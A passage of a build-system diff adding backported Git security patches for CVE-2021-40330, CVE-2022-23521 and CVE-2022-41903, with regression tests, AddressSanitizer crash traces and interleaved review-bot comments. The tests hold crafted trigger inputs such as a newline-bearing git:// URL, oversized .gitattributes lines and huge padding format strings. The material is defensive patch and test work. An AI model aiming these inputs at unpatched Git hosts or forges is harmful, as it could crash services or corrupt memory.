+git-daemon's log that it was not contacted at all, but we do not
+currently record the log (and anyway, it would make the test racy with
+the daemon's log write). We'll just check the client-side stderr to make
+sure we hit the expected code path.
+
+Reported-by: Harold Kim <h.kim@flatt.tech>
+Signed-off-by: Jeff King <peff@peff.net>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backported [https://github.com/git/git/commit/a02ea577174ab8ed18f847cf1693f213e0b9c473]
+CVE: CVE-2021-40330
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ connect.c | 2 ++
+ t/t5570-git-daemon.sh | 5 +++++
+ 2 files changed, 7 insertions(+)
+
+diff --git a/connect.c b/connect.c
+index b6451ab..929de9a 100644
+--- a/connect.c
++++ b/connect.c
+@@ -1064,6 +1064,8 @@ static struct child_process *git_connect_git(int fd[2], char *hostandport,
+ target_host = xstrdup(hostandport);
+
+ transport_check_allowed("git");
++ if (strchr(target_host, '\n') || strchr(path, '\n'))
++ die(_("newline is forbidden in git:// hosts and repo paths"));
+
+ /*
+ * These underlying connection commands die() if they
+diff --git a/t/t5570-git-daemon.sh b/t/t5570-git-daemon.sh
+index 34487bb..79cd218 100755
+--- a/t/t5570-git-daemon.sh
++++ b/t/t5570-git-daemon.sh
+@@ -103,6 +103,11 @@ test_expect_success 'fetch notices corrupt idx' '
+ )
+ '
+
++test_expect_success 'client refuses to ask for repo with newline' '
++ test_must_fail git clone "$GIT_DAEMON_URL/repo$LF.git" dst 2>stderr &&
++ test_i18ngrep newline.is.forbidden stderr
++'
++
+ test_remote_error()
+ {
+ do_export=YesPlease
+--
+2.17.1
+
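Review bot: The patch header does not preserve upstream provenance. `From:` and `Date:` name the backporter, and the leading commit id e77ca0c7d577408878d2b3e8c7336e6119cb3931 differs from the upstream commit a02ea577174ab8ed18f847cf1693f213e0b9c473 cited in `Upstream-Status`, while the body carries Jeff King's sign-off as the apparent original author. Someone auditing the backport has to diff it against upstream to confirm it is unmodified; keeping the upstream `From:`/`Date:` lines and commit id, with the backporter only in the trailing `Signed-off-by:`, makes that check direct. The status keyword is also written `Backported`; the documented form is `Upstream-Status: Backport [https://github.com/git/git/commit/a02ea577174ab8ed18f847cf1693f213e0b9c473]`, which is what patch-review tooling is likely to match.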
diff --git a/meta/recipes-devtools/git/files/CVE-2022-23521.patch b/meta/recipes-devtools/git/files/CVE-2022-23521.patch
new file mode 100644
index 0000000000..974546013d
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-23521.patch
@@ -0,0 +1,367 @@
+From eb22e7dfa23da6bd9aed9bd1dad69e1e8e167d24 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:45:15 +0100
+Subject: [PATCH] CVE-2022-23521
+
+attr: fix overflow when upserting attribute with overly long name
+
+The function `git_attr_internal()` is called to upsert attributes into
+the global map. And while all callers pass a `size_t`, the function
+itself accepts an `int` as the attribute name's length. This can lead to
+an integer overflow in case the attribute name is longer than `INT_MAX`.
+
+Now this overflow seems harmless as the first thing we do is to call
+`attr_name_valid()`, and that function only succeeds in case all chars
+in the range of `namelen` match a certain small set of chars. We thus
+can't do an out-of-bounds read as NUL is not part of that set and all
+strings passed to this function are NUL-terminated. And furthermore, we
+wouldn't ever read past the current attribute name anyway due to the
+same reason. And if validation fails we will return early.
+
+On the other hand it feels fragile to rely on this behaviour, even more
+so given that we pass `namelen` to `FLEX_ALLOC_MEM()`. So let's instead
+just do the correct thing here and accept a `size_t` as line length.
+
+Upstream-Status: Backport [https://github.com/git/git/commit/eb22e7dfa23da6bd9aed9bd1dad69e1e8e167d24 &https://github.com/git/git/commit/8d0d48cf2157cfb914db1f53b3fe40785b86f3aa & https://github.com/git/git/commit/24557209500e6ed618f04a8795a111a0c491a29c & https://github.com/git/git/commit/34ace8bad02bb14ecc5b631f7e3daaa7a9bba7d9 & https://github.com/git/git/commit/447ac906e189535e77dcb1f4bbe3f1bc917d4c12 & https://github.com/git/git/commit/e1e12e97ac73ded85f7d000da1063a774b3cc14f & https://github.com/git/git/commit/a60a66e409c265b2944f18bf43581c146812586d & https://github.com/git/git/commit/d74b1fd54fdbc45966d12ea907dece11e072fb2b & https://github.com/git/git/commit/dfa6b32b5e599d97448337ed4fc18dd50c90758f & https://github.com/git/git/commit/3c50032ff5289cc45659f21949c8d09e52164579
+
+CVE: CVE-2022-23521
+
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ attr.c | 97 +++++++++++++++++++++++++++----------------
+ attr.h | 12 ++++++
+ t/t0003-attributes.sh | 59 ++++++++++++++++++++++++++
+ 3 files changed, 132 insertions(+), 36 deletions(-)
+
+diff --git a/attr.c b/attr.c
+index 11f19b5..63484ab 100644
+--- a/attr.c
++++ b/attr.c
+@@ -29,7 +29,7 @@ static const char git_attr__unknown[] = "(builtin)unknown";
+ #endif
+
+ struct git_attr {
+- int attr_nr; /* unique attribute number */
++ unsigned int attr_nr; /* unique attribute number */
+ char name[FLEX_ARRAY]; /* attribute name */
+ };
+
+@@ -221,7 +221,7 @@ static void report_invalid_attr(const char *name, size_t len,
+ * dictionary. If no entry is found, create a new attribute and store it in
+ * the dictionary.
+ */
+-static const struct git_attr *git_attr_internal(const char *name, int namelen)
++static const struct git_attr *git_attr_internal(const char *name, size_t namelen)
+ {
+ struct git_attr *a;
+
+@@ -237,8 +237,8 @@ static const struct git_attr *git_attr_internal(const char *name, int namelen)
+ a->attr_nr = hashmap_get_size(&g_attr_hashmap.map);
+
+ attr_hashmap_add(&g_attr_hashmap, a->name, namelen, a);
+- assert(a->attr_nr ==
+- (hashmap_get_size(&g_attr_hashmap.map) - 1));
++ if (a->attr_nr != hashmap_get_size(&g_attr_hashmap.map) - 1)
++ die(_("unable to add additional attribute"));
+ }
+
+ hashmap_unlock(&g_attr_hashmap);
+@@ -283,7 +283,7 @@ struct match_attr {
+ const struct git_attr *attr;
+ } u;
+ char is_macro;
+- unsigned num_attr;
++ size_t num_attr;
+ struct attr_state state[FLEX_ARRAY];
+ };
+
+@@ -300,7 +300,7 @@ static const char *parse_attr(const char *src, int lineno, const char *cp,
+ struct attr_state *e)
+ {
+ const char *ep, *equals;
+- int len;
++ size_t len;
+
+ ep = cp + strcspn(cp, blank);
+ equals = strchr(cp, '=');
+@@ -344,8 +344,7 @@ static const char *parse_attr(const char *src, int lineno, const char *cp,
+ static struct match_attr *parse_attr_line(const char *line, const char *src,
+ int lineno, int macro_ok)
+ {
+- int namelen;
+- int num_attr, i;
++ size_t namelen, num_attr, i;
+ const char *cp, *name, *states;
+ struct match_attr *res = NULL;
+ int is_macro;
+@@ -356,6 +355,11 @@ static struct match_attr *parse_attr_line(const char *line, const char *src,
+ return NULL;
+ name = cp;
+
++ if (strlen(line) >= ATTR_MAX_LINE_LENGTH) {
++ warning(_("ignoring overly long attributes line %d"), lineno);
++ return NULL;
++ }
++
+ if (*cp == '"' && !unquote_c_style(&pattern, name, &states)) {
+ name = pattern.buf;
+ namelen = pattern.len;
+@@ -392,10 +396,9 @@ static struct match_attr *parse_attr_line(const char *line, const char *src,
+ goto fail_return;
+ }
+
+- res = xcalloc(1,
+- sizeof(*res) +
+- sizeof(struct attr_state) * num_attr +
+- (is_macro ? 0 : namelen + 1));
++ res = xcalloc(1, st_add3(sizeof(*res),
++ st_mult(sizeof(struct attr_state), num_attr),
++ is_macro ? 0 : namelen + 1));
+ if (is_macro) {
+ res->u.attr = git_attr_internal(name, namelen);
+ } else {
+@@ -458,11 +461,12 @@ struct attr_stack {
+
+ static void attr_stack_free(struct attr_stack *e)
+ {
+- int i;
++ unsigned i;
+ free(e->origin);
+ for (i = 0; i < e->num_matches; i++) {
+ struct match_attr *a = e->attrs[i];
+- int j;
++ size_t j;
++
+ for (j = 0; j < a->num_attr; j++) {
+ const char *setto = a->state[j].setto;
+ if (setto == ATTR__TRUE ||
+@@ -671,8 +675,8 @@ static void handle_attr_line(struct attr_stack *res,
+ a = parse_attr_line(line, src, lineno, macro_ok);
+ if (!a)
+ return;
+- ALLOC_GROW(res->attrs, res->num_matches + 1, res->alloc);
+- res->attrs[res->num_matches++] = a;
++ ALLOC_GROW_BY(res->attrs, res->num_matches, 1, res->alloc);
++ res->attrs[res->num_matches - 1] = a;
+ }
+
+ static struct attr_stack *read_attr_from_array(const char **list)
+@@ -711,21 +715,37 @@ void git_attr_set_direction(enum git_attr_direction new_direction)
+
+ static struct attr_stack *read_attr_from_file(const char *path, int macro_ok)
+ {
++ struct strbuf buf = STRBUF_INIT;
+ FILE *fp = fopen_or_warn(path, "r");
+ struct attr_stack *res;
+- char buf[2048];
+ int lineno = 0;
++ int fd;
++ struct stat st;
+
+ if (!fp)
+ return NULL;
+- res = xcalloc(1, sizeof(*res));
+- while (fgets(buf, sizeof(buf), fp)) {
+- char *bufp = buf;
+- if (!lineno)
+- skip_utf8_bom(&bufp, strlen(bufp));
+- handle_attr_line(res, bufp, path, ++lineno, macro_ok);
++
++ fd = fileno(fp);
++ if (fstat(fd, &st)) {
++ warning_errno(_("cannot fstat gitattributes file '%s'"), path);
++ fclose(fp);
++ return NULL;
+ }
++ if (st.st_size >= ATTR_MAX_FILE_SIZE) {
++ warning(_("ignoring overly large gitattributes file '%s'"), path);
++ fclose(fp);
++ return NULL;
++ }
++
++ CALLOC_ARRAY(res, 1);
++ while (strbuf_getline(&buf, fp) != EOF) {
++ if (!lineno && starts_with(buf.buf, utf8_bom))
++ strbuf_remove(&buf, 0, strlen(utf8_bom));
++ handle_attr_line(res, buf.buf, path, ++lineno, macro_ok);
++ }
++
+ fclose(fp);
++ strbuf_release(&buf);
+ return res;
+ }
+
+@@ -736,13 +756,18 @@ static struct attr_stack *read_attr_from_index(const struct index_state *istate,
+ struct attr_stack *res;
+ char *buf, *sp;
+ int lineno = 0;
++ size_t size;
+
+ if (!istate)
+ return NULL;
+
+- buf = read_blob_data_from_index(istate, path, NULL);
++ buf = read_blob_data_from_index(istate, path, &size);
+ if (!buf)
+ return NULL;
++ if (size >= ATTR_MAX_FILE_SIZE) {
++ warning(_("ignoring overly large gitattributes blob '%s'"), path);
++ return NULL;
++ }
+
+ res = xcalloc(1, sizeof(*res));
+ for (sp = buf; *sp; ) {
+@@ -1012,12 +1037,12 @@ static int macroexpand_one(struct all_attrs_item *all_attrs, int nr, int rem);
+ static int fill_one(const char *what, struct all_attrs_item *all_attrs,
+ const struct match_attr *a, int rem)
+ {
+- int i;
++ size_t i;
+
+- for (i = a->num_attr - 1; rem > 0 && i >= 0; i--) {
+- const struct git_attr *attr = a->state[i].attr;
++ for (i = a->num_attr; rem > 0 && i > 0; i--) {
++ const struct git_attr *attr = a->state[i - 1].attr;
+ const char **n = &(all_attrs[attr->attr_nr].value);
+- const char *v = a->state[i].setto;
++ const char *v = a->state[i - 1].setto;
+
+ if (*n == ATTR__UNKNOWN) {
+ debug_set(what,
+@@ -1036,11 +1061,11 @@ static int fill(const char *path, int pathlen, int basename_offset,
+ struct all_attrs_item *all_attrs, int rem)
+ {
+ for (; rem > 0 && stack; stack = stack->prev) {
+- int i;
++ unsigned i;
+ const char *base = stack->origin ? stack->origin : "";
+
+- for (i = stack->num_matches - 1; 0 < rem && 0 <= i; i--) {
+- const struct match_attr *a = stack->attrs[i];
++ for (i = stack->num_matches; 0 < rem && 0 < i; i--) {
++ const struct match_attr *a = stack->attrs[i - 1];
+ if (a->is_macro)
+ continue;
+ if (path_matches(path, pathlen, basename_offset,
+@@ -1071,11 +1096,11 @@ static void determine_macros(struct all_attrs_item *all_attrs,
+ const struct attr_stack *stack)
+ {
+ for (; stack; stack = stack->prev) {
+- int i;
+- for (i = stack->num_matches - 1; i >= 0; i--) {
+- const struct match_attr *ma = stack->attrs[i];
++ unsigned i;
++ for (i = stack->num_matches; i > 0; i--) {
++ const struct match_attr *ma = stack->attrs[i - 1];
+ if (ma->is_macro) {
+- int n = ma->u.attr->attr_nr;
++ unsigned int n = ma->u.attr->attr_nr;
+ if (!all_attrs[n].macro) {
+ all_attrs[n].macro = ma;
+ }
+@@ -1127,7 +1152,7 @@ void git_check_attr(const struct index_state *istate,
+ collect_some_attrs(istate, path, check);
+
+ for (i = 0; i < check->nr; i++) {
+- size_t n = check->items[i].attr->attr_nr;
++ unsigned int n = check->items[i].attr->attr_nr;
+ const char *value = check->all_attrs[n].value;
+ if (value == ATTR__UNKNOWN)
+ value = ATTR__UNSET;
+diff --git a/attr.h b/attr.h
+index b0378bf..f424285 100644
+--- a/attr.h
++++ b/attr.h
+@@ -1,6 +1,18 @@
+ #ifndef ATTR_H
+ #define ATTR_H
+
++/**
++ * The maximum line length for a gitattributes file. If the line exceeds this
++ * length we will ignore it.
++ */
++#define ATTR_MAX_LINE_LENGTH 2048
++
++ /**
++ * The maximum size of the giattributes file. If the file exceeds this size we
++ * will ignore it.
++ */
++#define ATTR_MAX_FILE_SIZE (100 * 1024 * 1024)
++
+ struct index_state;
+
+ /* An attribute is a pointer to this opaque structure */
+diff --git a/t/t0003-attributes.sh b/t/t0003-attributes.sh
+index 71e63d8..556245b 100755
+--- a/t/t0003-attributes.sh
++++ b/t/t0003-attributes.sh
+@@ -342,4 +342,63 @@ test_expect_success 'query binary macro directly' '
+ test_cmp expect actual
+ '
+
++test_expect_success 'large attributes line ignored in tree' '
++ test_when_finished "rm .gitattributes" &&
++ printf "path %02043d" 1 >.gitattributes &&
++ git check-attr --all path >actual 2>err &&
++ echo "warning: ignoring overly long attributes line 1" >expect &&
++ test_cmp expect err &&
++ test_must_be_empty actual
++'
++
++test_expect_success 'large attributes line ignores trailing content in tree' '
++ test_when_finished "rm .gitattributes" &&
++ # older versions of Git broke lines at 2048 bytes; the 2045 bytes
++ # of 0-padding here is accounting for the three bytes of "a 1", which
++ # would knock "trailing" to the "next" line, where it would be
++ # erroneously parsed.
++ printf "a %02045dtrailing attribute\n" 1 >.gitattributes &&
++ git check-attr --all trailing >actual 2>err &&
++ echo "warning: ignoring overly long attributes line 1" >expect &&
++ test_cmp expect err &&
++ test_must_be_empty actual
++'
++
++test_expect_success EXPENSIVE 'large attributes file ignored in tree' '
++ test_when_finished "rm .gitattributes" &&
++ dd if=/dev/zero of=.gitattributes bs=101M count=1 2>/dev/null &&
++ git check-attr --all path >/dev/null 2>err &&
++ echo "warning: ignoring overly large gitattributes file ${SQ}.gitattributes${SQ}" >expect &&
++ test_cmp expect err
++'
++
++test_expect_success 'large attributes line ignored in index' '
++ test_when_finished "git update-index --remove .gitattributes" &&
++ blob=$(printf "path %02043d" 1 | git hash-object -w --stdin) &&
++ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
++ git check-attr --cached --all path >actual 2>err &&
++ echo "warning: ignoring overly long attributes line 1" >expect &&
++ test_cmp expect err &&
++ test_must_be_empty actual
++'
++
++test_expect_success 'large attributes line ignores trailing content in index' '
++ test_when_finished "git update-index --remove .gitattributes" &&
++ blob=$(printf "a %02045dtrailing attribute\n" 1 | git hash-object -w --stdin) &&
++ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
++ git check-attr --cached --all trailing >actual 2>err &&
++ echo "warning: ignoring overly long attributes line 1" >expect &&
++ test_cmp expect err &&
++ test_must_be_empty actual
++'
++
++test_expect_success EXPENSIVE 'large attributes file ignored in index' '
++ test_when_finished "git update-index --remove .gitattributes" &&
++ blob=$(dd if=/dev/zero bs=101M count=1 2>/dev/null | git hash-object -w --stdin) &&
++ git update-index --add --cacheinfo 100644,$blob,.gitattributes &&
++ git check-attr --cached --all path >/dev/null 2>err &&
++ echo "warning: ignoring overly large gitattributes blob ${SQ}.gitattributes${SQ}" >expect &&
++ test_cmp expect err
++'
++
+ test_done
+--
+2.25.1
+
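Review bot: In the `read_attr_from_index` hunk of attr.c, the new `size >= ATTR_MAX_FILE_SIZE` branch returns NULL without releasing `buf`, which `read_blob_data_from_index` has just returned and which holds at least ATTR_MAX_FILE_SIZE bytes on that path. The rest of the function is outside the hunk, so ownership of `buf` is inferred from the `if (!buf) return NULL;` pattern rather than shown; if it is heap-allocated, every oversized `.gitattributes` blob in the index leaks its full contents. Adding `free(buf);` before that `return NULL;` closes the path. Because this file squashes the upstream commits listed in `Upstream-Status`, the fix is better carried as a separate follow-up patch so the backport stays comparable with upstream.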
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch
new file mode 100644
index 0000000000..87091abd47
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-01.patch
@@ -0,0 +1,39 @@
+From a244dc5b0a629290881641467c7a545de7508ab2 Mon Sep 17 00:00:00 2001
+From: Carlo Marcelo Arenas Belón <carenas@gmail.com>
+Date: Tue, 2 Nov 2021 15:46:06 +0000
+Subject: [PATCH 01/12] test-lib: add prerequisite for 64-bit platforms
+
+Allow tests that assume a 64-bit `size_t` to be skipped in 32-bit
+platforms and regardless of the size of `long`.
+
+This imitates the `LONG_IS_64BIT` prerequisite.
+
+Signed-off-by: Carlo Marcelo Arenas Belón <carenas@gmail.com>
+Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/a244dc5b0a629290881641467c7a545de7508ab2]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ t/test-lib.sh | 4 ++++
+ 1 file changed, 4 insertions(+)
+
+diff --git a/t/test-lib.sh b/t/test-lib.sh
+index e06fa02..db5ec2f 100644
+--- a/t/test-lib.sh
++++ b/t/test-lib.sh
+@@ -1613,6 +1613,10 @@ build_option () {
+ sed -ne "s/^$1: //p"
+ }
+
++test_lazy_prereq SIZE_T_IS_64BIT '
++ test 8 -eq "$(build_option sizeof-size_t)"
++'
++
+ test_lazy_prereq LONG_IS_64BIT '
+ test 8 -le "$(build_option sizeof-long)"
+ '
+--
+2.25.1
+
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch
new file mode 100644
index 0000000000..f35e55b585
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-02.patch
@@ -0,0 +1,187 @@
+From 81dc898df9b4b4035534a927f3234a3839b698bf Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:25 +0100
+Subject: [PATCH 02/12] pretty: fix out-of-bounds write caused by integer overflow
+
+When using a padding specifier in the pretty format passed to git-log(1)
+we need to calculate the string length in several places. These string
+lengths are stored in `int`s though, which means that these can easily
+overflow when the input lengths exceeds 2GB. This can ultimately lead to
+an out-of-bounds write when these are used in a call to memcpy(3P):
+
+ ==8340==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f1ec62f97fe at pc 0x7f2127e5f427 bp 0x7ffd3bd63de0 sp 0x7ffd3bd63588
+ WRITE of size 1 at 0x7f1ec62f97fe thread T0
+ #0 0x7f2127e5f426 in __interceptor_memcpy /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827
+ #1 0x5628e96aa605 in format_and_pad_commit pretty.c:1762
+ #2 0x5628e96aa7f4 in format_commit_item pretty.c:1801
+ #3 0x5628e97cdb24 in strbuf_expand strbuf.c:429
+ #4 0x5628e96ab060 in repo_format_commit_message pretty.c:1869
+ #5 0x5628e96acd0f in pretty_print_commit pretty.c:2161
+ #6 0x5628e95a44c8 in show_log log-tree.c:781
+ #7 0x5628e95a76ba in log_tree_commit log-tree.c:1117
+ #8 0x5628e922bed5 in cmd_log_walk_no_free builtin/log.c:508
+ #9 0x5628e922c35b in cmd_log_walk builtin/log.c:549
+ #10 0x5628e922f1a2 in cmd_log builtin/log.c:883
+ #11 0x5628e9106993 in run_builtin git.c:466
+ #12 0x5628e9107397 in handle_builtin git.c:721
+ #13 0x5628e9107b07 in run_argv git.c:788
+ #14 0x5628e91088a7 in cmd_main git.c:923
+ #15 0x5628e939d682 in main common-main.c:57
+ #16 0x7f2127c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #17 0x7f2127c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #18 0x5628e91020e4 in _start ../sysdeps/x86_64/start.S:115
+
+ 0x7f1ec62f97fe is located 2 bytes to the left of 4831838265-byte region [0x7f1ec62f9800,0x7f1fe62f9839)
+ allocated by thread T0 here:
+ #0 0x7f2127ebe7ea in __interceptor_realloc /usr/src/debug/gcc/libsanitizer/asan/asan_malloc_linux.cpp:85
+ #1 0x5628e98774d4 in xrealloc wrapper.c:136
+ #2 0x5628e97cb01c in strbuf_grow strbuf.c:99
+ #3 0x5628e97ccd42 in strbuf_addchars strbuf.c:327
+ #4 0x5628e96aa55c in format_and_pad_commit pretty.c:1761
+ #5 0x5628e96aa7f4 in format_commit_item pretty.c:1801
+ #6 0x5628e97cdb24 in strbuf_expand strbuf.c:429
+ #7 0x5628e96ab060 in repo_format_commit_message pretty.c:1869
+ #8 0x5628e96acd0f in pretty_print_commit pretty.c:2161
+ #9 0x5628e95a44c8 in show_log log-tree.c:781
+ #10 0x5628e95a76ba in log_tree_commit log-tree.c:1117
+ #11 0x5628e922bed5 in cmd_log_walk_no_free builtin/log.c:508
+ #12 0x5628e922c35b in cmd_log_walk builtin/log.c:549
+ #13 0x5628e922f1a2 in cmd_log builtin/log.c:883
+ #14 0x5628e9106993 in run_builtin git.c:466
+ #15 0x5628e9107397 in handle_builtin git.c:721
+ #16 0x5628e9107b07 in run_argv git.c:788
+ #17 0x5628e91088a7 in cmd_main git.c:923
+ #18 0x5628e939d682 in main common-main.c:57
+ #19 0x7f2127c3c28f (/usr/lib/libc.so.6+0x2328f)
+ #20 0x7f2127c3c349 in __libc_start_main (/usr/lib/libc.so.6+0x23349)
+ #21 0x5628e91020e4 in _start ../sysdeps/x86_64/start.S:115
+
+ SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/src/debug/gcc/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:827 in __interceptor_memcpy
+ Shadow bytes around the buggy address:
+ 0x0fe458c572a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0fe458c572b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0fe458c572c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0fe458c572d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ 0x0fe458c572e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+ =>0x0fe458c572f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa]
+ 0x0fe458c57300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0fe458c57310: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0fe458c57320: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0fe458c57330: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ 0x0fe458c57340: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ Shadow byte legend (one shadow byte represents 8 application bytes):
+ Addressable: 00
+ Partially addressable: 01 02 03 04 05 06 07
+ Heap left redzone: fa
+ Freed heap region: fd
+ Stack left redzone: f1
+ Stack mid redzone: f2
+ Stack right redzone: f3
+ Stack after return: f5
+ Stack use after scope: f8
+ Global redzone: f9
+ Global init order: f6
+ Poisoned by user: f7
+ Container overflow: fc
+ Array cookie: ac
+ Intra object redzone: bb
+ ASan internal: fe
+ Left alloca redzone: ca
+ Right alloca redzone: cb
+ ==8340==ABORTING
+
+The pretty format can also be used in `git archive` operations via the
+`export-subst` attribute. So this is what in our opinion makes this a
+critical issue in the context of Git forges which allow to download an
+archive of user supplied Git repositories.
+
+Fix this vulnerability by using `size_t` instead of `int` to track the
+string lengths. Add tests which detect this vulnerability when Git is
+compiled with the address sanitizer.
+
+Reported-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
+Original-patch-by: Joern Schneeweisz <jschneeweisz@gitlab.com>
+Modified-by: Taylor Blau <me@ttalorr.com>
+Signed-off-by: Patrick Steinhardt <ps@pks.im>
+Signed-off-by: Junio C Hamano <gitster@pobox.com>
+
+Upstream-Status: Backport [https://github.com/git/git/commit/81dc898df9b4b4035534a927f3234a3839b698bf]
+CVE: CVE-2022-41903
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ pretty.c | 11 ++++++-----
+ t/t4205-log-pretty-formats.sh | 17 +++++++++++++++++
+ 2 files changed, 23 insertions(+), 5 deletions(-)
+
+diff --git a/pretty.c b/pretty.c
+index b32f036..637e344 100644
+--- a/pretty.c
++++ b/pretty.c
+@@ -1427,7 +1427,9 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ struct format_commit_context *c)
+ {
+ struct strbuf local_sb = STRBUF_INIT;
+- int total_consumed = 0, len, padding = c->padding;
++ size_t total_consumed = 0;
++ int len, padding = c->padding;
++
+ if (padding < 0) {
+ const char *start = strrchr(sb->buf, '\n');
+ int occupied;
+@@ -1439,7 +1441,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ }
+ while (1) {
+ int modifier = *placeholder == 'C';
+- int consumed = format_commit_one(&local_sb, placeholder, c);
++ size_t consumed = format_commit_one(&local_sb, placeholder, c);
+ total_consumed += consumed;
+
+ if (!modifier)
+@@ -1505,7 +1507,7 @@ static size_t format_and_pad_commit(struct strbuf *sb, /* in UTF-8 */
+ }
+ strbuf_addbuf(sb, &local_sb);
+ } else {
+- int sb_len = sb->len, offset = 0;
++ size_t sb_len = sb->len, offset = 0;
+ if (c->flush_type == flush_left)
+ offset = padding - len;
+ else if (c->flush_type == flush_both)
+@@ -1528,8 +1530,7 @@ static size_t format_commit_item(struct strbuf *sb, /* in UTF-8 */
+ const char *placeholder,
+ void *context)
+ {
+- int consumed;
+- size_t orig_len;
++ size_t consumed, orig_len;
+ enum {
+ NO_MAGIC,
+ ADD_LF_BEFORE_NON_EMPTY,
+diff --git a/t/t4205-log-pretty-formats.sh b/t/t4205-log-pretty-formats.sh
+index f42a69f..a2acee1 100755
+--- a/t/t4205-log-pretty-formats.sh
++++ b/t/t4205-log-pretty-formats.sh
+@@ -788,4 +788,21 @@ test_expect_success '%S in git log --format works with other placeholders (part
+ test_cmp expect actual
+ '
+
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
++ # We only assert that this command does not crash. This needs to be
++ # executed with the address sanitizer to demonstrate failure.
++ git log -1 --pretty="format:%>(2147483646)%x41%41%>(2147483646)%x41" >/dev/null
++'
++
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'set up huge commit' '
++ test-tool genzeros 2147483649 | tr "\000" "1" >expect &&
++ huge_commit=$(git commit-tree -F expect HEAD^{tree})
++'
++
++test_expect_success EXPENSIVE,SIZE_T_IS_64BIT 'log --pretty with huge commit message' '
++ git log -1 --format="%B%<(1)%x30" $huge_commit >actual &&
++ echo 0 >>expect &&
++ test_cmp expect actual
++'
++
+ test_done
+--
+2.25.1
+
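Review bot: In `format_and_pad_commit` only `total_consumed`, `consumed`, `sb_len` and `offset` become `size_t`; `len` and `padding` stay `int`, so `offset = padding - len` is still evaluated in `int`, and a negative result would convert to a very large `size_t` before it is used as an offset. The condition guarding that `else` branch is outside the hunk, so this cannot be ruled out from here; if the branch is only reached with `len <= padding`, a comment such as `/* len <= padding here, so the difference is non-negative */` would record the assumption. The subject marks this as 02 of 12, so the fix is presumably complete only with the whole series applied, and the recipe's SRC_URI should list every patch of the series in order. The added regression tests are gated on `EXPENSIVE` and, per their own comment, demonstrate the failure only under the address sanitizer, so a default test run will not exercise this fix.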
diff --git a/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch b/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch
new file mode 100644
index 0000000000..d83d77eaf7
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2022-41903-03.patch
@@ -0,0 +1,146 @@
+From b49f309aa16febeddb65e82526640a91bbba3be3 Mon Sep 17 00:00:00 2001
+From: Patrick Steinhardt <ps@pks.im>
+Date: Thu, 1 Dec 2022 15:46:30 +0100
+Subject: [PATCH 03/12] pretty: fix out-of-bounds read when left-flushing with stealing
+
+With the `%>>(<N>)` pretty formatter, you can ask git-log(1) et al to
+steal spaces. To do so we need to look ahead of the next token to see
+whether there are spaces there. This loop takes into account ANSI
+sequences that end with an `m`, and if it finds any it will skip them
+until it finds the first space. While doing so it does not take into
+account the buffer's limits though and easily does an out-of-bounds
+read.
+
+Add a test that hits this behaviour. While we don't have an easy way to
+verify this, the test causes the following failure when run with
+`SANITIZE=address`:
+
+ ==37941==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000baf at pc 0x55ba6f88e0d0 bp 0x7ffc84c50d20 sp 0x7ffc84c50d10
+ READ of size 1 at 0x603000000baf thread T0
+ #0 0x55ba6f88e0cf in format_and_pad_commit pretty.c:1712
+ #1 0x55ba6f88e7b4 in format_commit_item pretty.c:1801
+ #2 0x55ba6f9b1ae4 in strbuf_expand strbuf.c:429
+ #3 0x55ba6f88f020 in repo_format_commit_message pretty.c:1869
+ #4 0x55ba6f890ccf in pretty_print_commit pretty.c:2161
+ #5 0x55ba6f7884c8 in show_log log-tree.c:781
+ #6 0x55ba6f78b6ba in log_tree_commit log-tree.c:1117
